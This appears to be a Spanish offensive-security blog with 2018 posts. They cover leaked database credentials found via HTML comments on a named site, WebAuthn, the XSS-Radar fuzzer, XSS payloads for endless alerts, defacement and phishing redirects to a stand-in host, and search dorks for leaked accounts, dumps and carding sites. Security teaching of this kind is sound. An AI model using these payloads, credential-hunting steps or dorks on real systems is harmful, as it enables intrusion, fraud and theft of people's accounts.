RedBird - Seguridad Ofensiva

RedBird es una organización, con el fin de compartir y enseñar las distintas metodologías, herramientas o vulnerabilidades, que puedan dañar los sistemas informáticos o la información que estos manejan, con el objetivo de mejorar la seguridad de estos, ayudando tanto a los administradores, desarrolladores y usuarios.

RedBird

INGENIERÍA SOCIAL - DOXING - OSINT - DORKS - FOOTPRINTING - SEGURIDAD INFORMÁTICA - PROTECCIÓN DE DATOS PERSONALES - PENTESTING - TOOLS/HERRAMIENTAS - INFORTATION GATHERING - METODOLOGÍA OWASP - [in]SEGURIDAD WEB - OWASP

Pruebas de Seguridad

Informando, sobre las nuevas brechas de seguridad que se van descubriendo.

RedBirdTeam

Con un grupo de expertos en el área de la seguridad informática, en distintos ámbitos, como lo son: seguridad web, seguridad en servidores, seguridad en redes WiFi y mucho más

Comunidades

Trabajos de la mano de distintas organizaciones, empresas y comunidades para llevar acabo distintas labores

lunes, 23 de abril de 2018

Fuga de información en el código HTML de paginas web

Fuga de información en el código HTML de paginas web

 


Cuando se realizan pruebas de seguridad y penetración a paginas web o aplicaciones web, lo primero que se recomiendo hacer es analizar el codigo HTML. Esto se debe a que podemos encontrar información muy interesante (jugosa) que nos puede ayudar a encontrar fallos, comprender el como esta desarrollada la aplicacion o pagina web, sin embargo también tenemos algo muy curisos, los comentarios de los desarrolladores que pueden dejar olvidados.

Cada que tengamos una aplicacion web, o pagina web, de las primeras cosas que debemos hacer es inspeccionar el codigo HTML, pero ¿Para que?

Cuando inspeccionamos el código HTML podemos encontrar información como:
  • Archivos
  • Comentarios del desarrollador
  • URL interesantes
Por ejemplo, si analizamos el código HTML de una pagina web, linea por linea (puede ser tardado o aburrido) nos encontramos con lo siguiente:


Tenemos un pequeño código PHP, cuando una aplicacion web necesita conectarse con una base de datos MySQL requiere de un conjunto de parámetros para poder establecer la conexion como lo son el nombre del host, el nombre de la base de datos el usuario y contraseña. En el caso de nuestro código, tenemos un archivo que realiza una llamada
mysql_connect / mysql_pconnect que incluye las credenciales de conexión MySQL.

Lo que puede ser interesante, es el archivo "bokajnr.inc", lo que podemos hacer es lo siguiente www.sitio.com/bokajnr.inc y veamos que pasa.




Podemos descargalo o abrirlo, en mi caso lo abrí con Sublime Text un editor de textos muy bueno (lo recomiendo).



Pero que sorpresa... no?


Nivel 1 de HackThisSite
Analizar el código HTML, es un punto clave e importante al momento de realizar pruebas de seguridad o penetracion, puede que encontremos algo que un desarrollador dejara olvidado como lo pueden ser notas al momento de desarrollar la pagina o aplicacion web, direcciones a archivos, incluso podemos dar con el Index.



Sitio vulnerable: indoushka
Post: Drok3r

jueves, 12 de abril de 2018

WebAuthn | Nuevo estándar web de autenticación


Un Internet sin PASSW*RD



Foros, blogs, redes sociales, aplicaciones, tiendas y un sinfín más de aplicaciones y sistemas en Internet, manejan grandes cantidades de información, la cual hasta cierto punto debe mantenerse y solo accesible para los usuarios quienes tienen privilegio de acceso a esta información o son dueños de estos.


Los sistemas y la información son protegidos por un método de autenticación estándar, donde solo se necesitan las credenciales de acceso, usuario y contraseña, un método a día de hoy muy desgastado y castigado por malas prácticas,  y técnicas que permiten comprometer estas credenciales. Malas prácticas como contraseñas por defecto, o muy fáciles de adivinar por otro lado la gran cantidad de técnicas y su sofisticación al paso del tiempo, nos han permitido comprometer este método en más de una ocasión.


El avance tecnológico ha demostrado que no solo usuarios y contraseñas son necesarios para lograr una autenticación, a día de hoy los dispositivos móviles y los tantos dispositivos nos permiten autenticarnos por otros medios, como lo son: reconocimiento facial, huellas dactilares, voz, etc.


webauthn
El reconocimiento facial y las huellas dactilares son dos métodos que la FIDO y el consorcio de World Wide Web los han tomado en cuenta para el nuevo estándar de autenticación web denominado WebAuthn, desarrollado con la colaboración de los principales navegadores Web del mercado como lo son Google Chrome, Mozilla Firefox, Microsoft Edge y Opera.



WebAuthn define una API abierta que podrán integrar directamente las páginas y navegadores web, con el objetivo de modernizar de una vez por todas la autenticación en cualquier sitio web implementando medidas como las mencionadas, u otras más especializadas, como dispositivos específicos, léase USB, móviles o wearables, siempre con un identificador externo que sirva de medio de comprobación” by. Muyseguridad.net 


Con las nuevas especificaciones FIDO2 y el soporte de los navegadores web líderes que anunciamos hoy, estamos dando un gran paso adelante para hacer que la autenticación FIDO sea ubicua en todas las plataformas y dispositivos“, comenta Brett McDowell, director ejecutivo de la Alianza FIDO. “Aunque hay muchos problemas de seguridad y no podemos solucionarlos todos, confiar en las contraseñas es uno de los eslabones más débiles. WebAuthn cambiará la forma en que la gente accede a la web“, aclara.

Fuente:www.muyseguridad.net

sábado, 24 de marzo de 2018

XSS-Radar | Una extencion para descubrir vulnerabilidades XSS



Una extensión para descubrir vulnerabilidades XSS



https://user-images.githubusercontent.com/4115778/27097021-d8f2a73e-506a-11e7-8dd2-0ec615322516.png
XSS Radar es una extensión para Chrome, la cual tiene la función de ser rápida y fácil para XSS fuzzing. Sin embargo XSS-Radar, solo puede detectar XSS Reflejado y no XSS basado en DOM, XSS almacenado y Self-XSS. Por otra parte la extensión solo esta disponible para Chrome, de acuerdo al desarrollador en un futuro XSS-Radar podrá integrarse a FireFox.

Contextos y pruebas

Con XSS-Radar se desarrollaron contextos, y sus respectivas pruebas, de forma totalmente modular. Al hacerlo, hemos facilitado la contribución de nuevas metodologías al módulo de escáneres de Radar.
 
Los contextos se encuentran en contexts.js (inside extension/src/payloads/ ). Tras el borrado, el escáner busca los contextos aplicables en el destino y despliega las cargas útiles correctas. Por ejemplo, los errores XSS basados ​​en enlaces a menudo se basan en la inyección dentro del atributo href , por lo que hemos agregado un contexto que específicamente coincide con estos:
 

{
    'type': 'a', // link/anchor type
    'matches': ['href'], // URI attribute
    'file': 'link.js' // payload file
}
 
Las pruebas se encuentran dentro del subdirectorio del playground . XSS Playground contiene una variedad de escenarios de scripts entre sitios diseñados para respaldar el desarrollo y garantizar la efectividad de Radar. En la actualidad, probamos vectores clásicos, inyección de JavaScript, desgloses de etiquetas y vulnerabilidades de plantillas.

Para instalarlo:
  1. Primero, git clone https://github.com/bugbountyforum/XSS-Radar
  2. Visita chrome://extensions/
  3. Habilitar el modo de desarrollador a través de la casilla de verificación
  4. Seleccione "Cargar extensión no empaquetada"
  5. Finalmente, busque y seleccione la carpeta de extension interna

Payloads

XSS-Radar, cuenta con unos payloads por defecto, sin embargo el usuario puede agregar los suyos
  • Inyección de plantilla AngularJS
    • Se admiten todas las versiones con un Expression Sandbox vulnerable
  • URIs basados ​​en enlaces
  • Inyecciones de guiones
  • Cadenas de etiquetas genéricas 
Para agregar nuevos o más Payloads, iremos a la direccion extension/src/payloads dentro de nuestra carpeta de XSS-Radar. Una vez en este sitio tendremos 5 archivos .js en donde agregaremos nuestros payloads.

Te dejo este PastBin donde podras encontrar mas Payloads XSS: Payloads XSS Filter Bypass List


 Instalación y Pruebas de vulnerabilidades (Entorno controlado/Entorno real)

En la parte superior se muestra como, se instala XSS-RADAR, en 5 simples pasos, y su funcionamiento es muy simple.



Ya una vez, con el repositorio clonado, nos vamos a chrome, en las extensiones( chrome://extensions/ ).






Seleccionamos XSS-Radar y reiniciamos el Chrome (no en todos los casos se reinicia, sin embargo yo lo hice porque no me carga los payload). Y listo, tendremos a nuestro XSS-Radar listo, solo es cuestión de hacer pruebas.


 

 


domingo, 4 de marzo de 2018

Cross Site Scripting | Jugando - Parte 1

Jugando con los Alert()



Ya en otras ocasiones hemos visto la función básica de la vulnerabilidad XSS, desde como se busca, identifica y explota utilizando un sencillo script o payload, con el fin de hacer que el sitio nos muestre una alerta. Para lograr eso, existe infinidad de payloads, que nos permiten vurlar los WAF, los filtros anti-XSS, etc.

Lo que conocemos normalmente es: <script>alert("XSS")</script>.
De este script, nacen mas con el fin de poder burlar filtros, saltarnos etiquetas html, etc. Por ejemplo tenemos estos:

<script>alert("XSS")</script>

"><script>alert('XSS')</script>
'"><script>alert(/XSS/)</script>
"><b><script>alert(/xss/)</script></b>
<img src="x" onerror="alert(1)"">
'"><svg/onload=alert(/XSSPOSED/)>

Y un sin fin mas, de payloads. Sin embargo podemos jugar con los alert, aprovechándonos de la programación javascript y teniendo un poco de imaginacion (xD).

Por ejemplo, podemos utilizar un windows confirm.

<script>function redBIRD() { if (confirm("Selecciona OK")) { alert("RedBirdTeam"); }else { alert("No le diste al OK"); } redBIRD(); } redBIRD(); </script>



Jugando un poco, con una victima o con el XSS. Pero aun podemos ir mas lejos, podemos hacer que los alert, sean "infinitos":

"><script>for (;;) alert("Hacked by.Drok3r")</script>

Defacement & Phishing

Este tipo de script, suele dejar "fuera de servicio" una aplicacion web, que contiene un XSS almacenado, pero gracias a las a nuestros navegadores como lo son Firefox o Chrome, podemos evitar este tipo de ataques.

También podemos llegar a un Defacement con el XSS, sin embargo tiene sus ventajas y desventajas, una de ellas, es que si la vulnerabilidad es reflejada, solo afectara a quien acceda al enlace con el payload, pero si es un xss almacenado, si afecta a cualquiera que acceda a la pagina. Tanto podemos afectar al usuario con un Defacement, podemos redireccionarlo a un phishing del mismo sitio.

Para eso podemos utilizar ya sea que busquemos un defacement o redireccionar a un phishing:

<script> document.location.href = "http://redbird.com/deface.php"; </script>
<script> window.location= "http://
redbird.com/deface.php"; </script> 
<script> location.assign(""http://
redbird.com/deface.php""); </script>
<script> location.replace("http://
redbird.com/deface.php"); </script>

EJEMPLO:

El ejemplo de arriba, redirecciona a una imagen que dice hacked.








lunes, 26 de febrero de 2018

BlackSearchInfoLeak - BSiL

B.S.i.L.



BSiL o BlackSearchInfoLeak es un motor de búsqueda personalizado, un tanto curioso, el cual nos ofrece realizar búsquedas de información posiblemente sensible. Esta información puede estar conformada por

  • Cuentas de Correo Electrónico comprometidas (Gmail, Hotmail, etc)
  • Cuentas de distintos servicios, paginas, etc.(Netflix, Spotify, etc)
  • Información filtrada. 
  • IP
BSiL los resultados que muestra probienen de estas 15 paginas.
  • 1)- Githug
  • 2)- Pastebin
  • 3)- Robtex
  • 4)- Shodan
  • 5)- Censys
  • 6)- Email Sherlock
  • 7)- Threatcrowd
  • 8)- Alienvault
  • 9)- Netcraft
  • 11)- Threatminer
  • 12)- GhostBin
  • 13)- HackStats
  • 14)- Pastefs
  • 15)- JustPaste
Sin embargo para poder sacar el máximo provecho de BSiL necesitamos, realizar búsquedas avanzadas por medio de Dorks. Por Ejemplo, si buscamos un correo electrónico el cual, posiblemente fuese comprometido pudieramos realizar estas búsquedas

[correo] inurl:pastebin

[correo] inurl:justpaste
[correo] inurl:pastefs
[correo] inurl:hackstats
[correo] inurl:ghostbin
  
Ahora que si buscamos, por ejemplo cuentas comprometidas de netflix, seria exactamente lo mismo.
 
netflix inurl:pastebin 
 



Dependiendo de nuestras necesidades, y habilidades podremos sacar un gran beneficio. Por ejemplo si realizamos la siguiente busqueda: dumps inurl:hackstats.
Podemos obtener desde sitios de carding, cuentas de netlfix, backup de bases de datos.
 
 
Actualmente BSiL esta en fase de pruebas, pues en ocaciones se tienen problemas con las busquedas, algunos sitios no son de utilidad, se agregaron mas dorks, etc.

Se espera entregar una version completa, en donde se podra incluir mas tipos de busquedas, por ejemplo; perfiles de redes sociales, vulnerabilidades, etc. Tambien se proporcionara una recopilacion de Dorks para que los usuarios puedan realizar sus busquedas. Si tienes sugerencias o aportaciones puedes ponerte en contacto con nosotros.

Informacion de contacto